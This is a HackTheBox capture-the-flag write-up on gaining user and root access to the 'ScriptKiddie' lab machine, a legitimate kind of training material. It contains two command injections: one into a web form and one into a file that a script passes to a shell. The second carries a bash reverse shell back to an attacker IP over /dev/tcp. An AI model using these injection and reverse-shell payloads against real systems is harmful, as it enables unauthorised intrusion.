This article is about how I rooted the machine “ScriptKiddie” from HackTheBox.
Enumeration
Let’s start with Nmap scan
-sC — Default script scan
-sV — Service/Version scan
-o — save the output
We have 2 open ports: 22, 5000.
Visit 10.10.10.226:5000.
It’s a simple website, where we can use some pentesting tools.
Let’s fire up “gobuster” against it
dir — scan for direcotires
-w — specify wordlist
-x — specify extensions
-u — specify url
-o — save output
We get nothing useful.
Getting a reverse shell
We have an option, to use the tool “searchsploit”.
The default syntax for using “searchsploit” is - “searchsploit [parameter]”
We can try searching for “openssh; whoami”, so the executed command will be “searchsploit openssh; whoami”.
“whoami” will be executed after “searchsploit openssh”
We get the following message:
We can try using more characters, that might be useful, like “||”, “&&”, but all of them are blocked.
Let’s try to find exploits for detected services and versions.
Nothing comes out.
Google “Werkzeug/0.16.1 exploit” and we find “Werkzeug Debug Shell Command Execution”
Let’s try it.
Fire up metasploit…
and follow the instructions
Set required options and run.
It doesn’t work.
Back to the home page, we can see that we’ve an option to upload a template file for windows, linux and android.
Let’s google “windows template file”, “linux template file”, “android template file”.
Nothing useful comes up.
Maybe we’re forgetting something, maybe a magic word!
Google “android template file exploit” and we find “Rapid7 Metasploit Framework msfvenom APK Template Command Injection”
Let’s start metasploit again and follow the instructions.
We generated a template file for android.
Now, let’s start the netcat listener on port 4444 and upload the template.
Click “generate”, wait few seconds and we get a reverse shell.
Stabilize the shell
We get a shell as a user “kid”.
Go to kid’s home directory and grab the user’s flag,
Horizontal Privilege Escalation
Try sudo -l
We’re asked for a password, we don’t know it.
View cronjobs
Nothing useful here, either.
Going to /home directory we see that there’s another user “pwn”
In pwn’s home directory, we find bash script called “scanlosers.sh”
It’s owned and executed by “pwn”. If we could directly write into it and then execute it, we would be able to get a second reverse shell as a user “pwn”, but we don’t have neither write, nor execute permissions. We gotta find another way around.
Notice that “hackers” file mentioned in script.
It’s owned by us and we can write into it.
If we try to write something in it, it gets cleared instantly, so there’s some hidden jobs that makes it empty over and over again.
Maybe the same kind of hidden job executes “scanlosers.sh”. If that’s true, the problem of not having “execute” permission is solved, but we still have to somehow pass a reverse shell to it.
If we take a closer look at a “scanloser.sh”, we notice that it reads “hackers” file line by line and runs nmap against them. nmap is executed by /bin/sh.
If we write following line into a hackers file:
“echo “ ;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.172/1234 0>&1’ #” >> hackers”
Executed command by script would be:
sh -c “nmap — top ports 10 -oN recon/;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.172/1234 0>&1’ #…………………..”
“;” breaks the command.
/bin/bash -c — means that the command that follows it will be executed by “bash”
then we have a standard bash reverse shell(don't forget to change the IP and port)
#- means that everything after it is considered as a comment. it’s just plain text and won't’ be executed. It doesn’t matter what is written after it.
So, we get something, that works with a similar logic, as SQL injection.
Start a new netcat listener on a different port, the one that’s not currently being used by another process.
write reverse shell into “hackers” file
As soon as we hit enter, we get a second reverse shell, as a user “pwn”
Horizontal Privilege Escalation
Getting root is pretty straight-forward
We can start Metasploit with root privileges(root), without using a password(NOPASSWD)
Valuable lesson learned: MAGIC WORD MAKES IMPOSSIBLE POSSIBLE!
